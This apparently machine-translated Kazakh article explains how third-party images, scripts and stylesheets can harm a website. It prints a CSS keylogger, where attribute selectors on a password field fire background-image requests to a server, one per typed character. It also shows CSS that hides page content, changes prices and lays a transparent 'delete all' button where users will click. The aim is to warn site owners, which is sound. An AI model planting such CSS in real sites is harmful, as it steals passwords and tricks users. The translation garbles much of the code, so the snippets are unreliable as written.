Аппараттық және бағдарламалық қамтамасыз етуді орнату

үй Бейне
Бейне

Үшінші тарап ресурсы не. есік

Біз сізге үшінші тарап CSS, JavaScript және басқа адамдардың серверлерінің басқа ресурстарын пайдаланып сайтыңызға қалай зиян келтіруге болатынын айтамыз.

Ақпан айының соңында желіде CSS-ті ішінара пайдаланатын кейлоггер пайда болды. Оның көмегімен шабуыл қарапайым: белгілі бір түрі бар өріске енгізілген әрбір таңба үшін (мысалы, пароль) үшінші тарап серверіне өңдік кескінді сұрайтын сұрау жасалады:

енгізу (фон суреті: url("http://localhost:3000/a"); )

background-image : url («http://localhost:3000/a» );

Серверде сұрау ретін тіркеуге және енгізілген құпия сөзді оңай есептеуге болады.

Мәселені талқылау барысында кейбіреулер браузер өндірушілеріне түзетумен жұмыс істеуді ұсынды. Біреу мәселенің тек React-like фреймворктарындағы сайттарға қатысты екенін байқап, кінәні соларға аударды.

үшінші тарап суреттері

< img src = "https://example.com/kitten.jpg">

Егер сіз осындай суретті сайтыңызға қоссаңыз, example.com сайтына тәуелді боласыз. Олар сізді баптай алады әртүрлі жолдар, мысалы, суретті алып тастаңыз - кескіннің орнына 404 аласыз. Немесе олар мысық бейнесін ұнамды емес нәрсемен алмастыра алады.

Сіз пайдаланушыларға суреттің үшінші тарап ресурсынан қосылғанын және оған қатысыңыз жоқ екенін ескерте аласыз. Бұл сізді біраз қиындықтан құтқарады. Бірақ, әрине, қарапайым суретті қосқанда, сіз құпия сөздерге рұқсат бермейсіз.

Үшінші тарап сценарийлері

Бұл мысал example.com үшін әлдеқайда қызықты, өйткені олардың сайтынан сценарийді қосу арқылы сіз оларға өздікін көбірек басқаруға мүмкіндік бересіз. Бұл жағдайда example.com келесі әрекеттерді орындауы мүмкін:

  • Бет мазмұнын оқу/өзгерту.
  • Әрбір пайдаланушы әрекетін қадағалаңыз.
  • Есептеу қиын кодты іске қосыңыз (мысалы, криптоминер).
  • Cookie файлдарын сұрау.
  • Жергілікті жадты оқу/өзгерту.

Басқаша айтқанда, қазір example.com көп нәрсені жасай алады.

Болашақта жергілікті жадпен өзара әрекеттесу көбірек әкеледі көбірек проблемалар. Сценарий беттен жойылғаннан кейін де үшінші тарап ресурсы сіздің сайтыңызға кіре алады. Сайтқа үшінші тарап сценарийін қоссаңыз, көзге және оның қауіпсіздігіне толық сенуіңіз керек.

Егер сіз әлі де қате сценарийге тап болсаңыз, Clear-Site-Data тақырыбын пайдаланып көріңіз.

Үшінші тарап CSS

< link rel = "stylesheet" href = "https://example.com/style.css">

Сайтқа әсер ететін үшінші тарап CSS-коды сурет пен сценарий арасында. Бөтен CSS мүмкін:

  • Беттегі мазмұнды жою/өзгерту/қосу.
  • Бет мазмұнына негізделген сұраулар жасаңыз.
  • Көптеген пайдаланушы әрекеттеріне жауап беріңіз.

CSS жергілікті жадпен өзара әрекеттесе алмайды және криптоминер бетке ендірмейді, бірақ ол ресурс иесіне көп зиян келтіруі мүмкін.

Keylogger

Мақаланың басынан бастап CSS-ті сәл өзгертейік:

енгізу (фон суреті: url("/password?a"); )

енгізу[түрі="құпия сөз"][мән$="a"](

background-image : url("/password?a" );

Бұл код енгізілген «a» таңбасы туралы деректерді сурет сұрауының астында өңдеушіге жібереді. Әр таңба үшін кодты қайталаңыз және сізде CSS пернетақтасы бар.

Әдепкі бойынша, браузерлер мән төлсипатында пайдаланушы енгізген таңбаларды сақтамайды, сондықтан осы сияқты мәндерді синхрондайтын нәрсені пайдалансаңыз, бұл трюк жұмыс істейді, мысалы.

Әрине, бұл мәселені React және ұқсас фреймворктар жағында шешуге болады. Бірақ содан кейін ғана нақты іс шешіледі, ал қалған мәселелер қалады.

Жоғалатын мазмұн

дене (дисплей: жоқ; ) html:: кейін (мазмұн: «HTTP серверінің қатесі»; )

дене (

көрсету: жоқ;

html::кейін(

мазмұны : "HTTP серверінің қатесі" ;

Бұл, әрине, өте ерекше мысал, бірақ әлі де жұмыс істейтін мысал. Елестетіп көріңізші, сіздің пайдаланушылар сайтқа кірген кезде әдеттегіден гөрі көретін болады басты беттүсініксіз қате. Сол сияқты, үшінші тарап коды, мысалы, «сатып алу» түймесін алып тастай алады немесе басқа да жағымсыздықтарды жасай алады.

Мазмұн қосу

Баға-мәні::бұрын (мазмұн: "1"; )

Баға - құн ::бұрын(

мазмұны: «1» ;

Дәл осылай сіздің бағаларыңыз шарықтап кетті.

Жылжымалы мазмұн

Барлығын жою түймесі ( мөлдірлік: 0; орын: абсолютті; жоғарғы: 500 пиксель; сол жақта: 300 пиксель; )

Барлығын жою түймесі (

мөлдірлік: 0

позиция : абсолютті ;

жоғарғы: 500px;

сол жақ: 300px

Пайдаланушы жай ғана баспайтын қорқынышты нәрсені жасайтын түймені алыңыз, оны мөлдір етіп, пайдаланушы міндетті түрде басатын жерге қойыңыз.

Әрине, егер түйме шынымен маңызды нәрсені жасаса, пайдаланушы алдымен ескерту диалогын көреді. Бірақ бұл да проблема емес: оған көбірек CSS қажет. Мысалы, «О, Құдайым, жоқ!» түймесінің мазмұнын «Әрине, мен сенімдімін» деп өзгертуге болады.

Браузер жасаушылар клавиатура трюкін түзететінін елестетіп көріңіз. Шабуыл жасаушылар маңызды құпия сөз өрісінің үстіне қосымша мәтін өрісін қояды және олар бизнеске қайтады.

Оқу атрибуттары

Мән және басқа атрибуттар міндетті түрде құпия сөздерді сақтамайды: шабуылдаушы басқа қызығушылық тудыратын нәрсені табуы мүмкін.

Мақала ұнады ма? Достарыңызбен бөлісіңіз!
Twitter
басып шығару
Бұл мақала пайдалы болды ма?
Иә
Жоқ
Пікіріңізге рахмет!
Бірдеңе дұрыс болмады және сіздің дауысыңыз есептелмеді.
рахмет. Сіздің хабарламаңыз жіберілді
Мәтіннен қате таптыңыз ба?
Оны таңдаңыз, басыңыз Ctrl+Enterжәне біз оны түзетеміз!
Қатысты кеңестер
Компьютерлік желіде жұмыс тобы қалай құрылады
Компьютерлік желіде жұмыс тобы қалай құрылады
Скриншотты қандай пернемен түсіру керек Компьютерде толық скриншотты қалай түсіруге болады
Скриншотты қандай пернемен түсіру керек Компьютерде толық скриншотты қалай түсіруге болады
Менің пошта жәшігім Яндекс менің парақшама кіріңіз
Менің пошта жәшігім Яндекс менің парақшама кіріңіз
Excel бағдарламасы – сақтау жолдары және оның опциялары
Excel бағдарламасы – сақтау жолдары және оның опциялары
Фотосуреттен адамды және қажет емес заттарды қалай алып тастауға болады?
Фотосуреттен адамды және қажет емес заттарды қалай алып тастауға болады?
Excel бағдарламасы – бағдарламамен жұмысты бастау
Excel бағдарламасы – бағдарламамен жұмысты бастау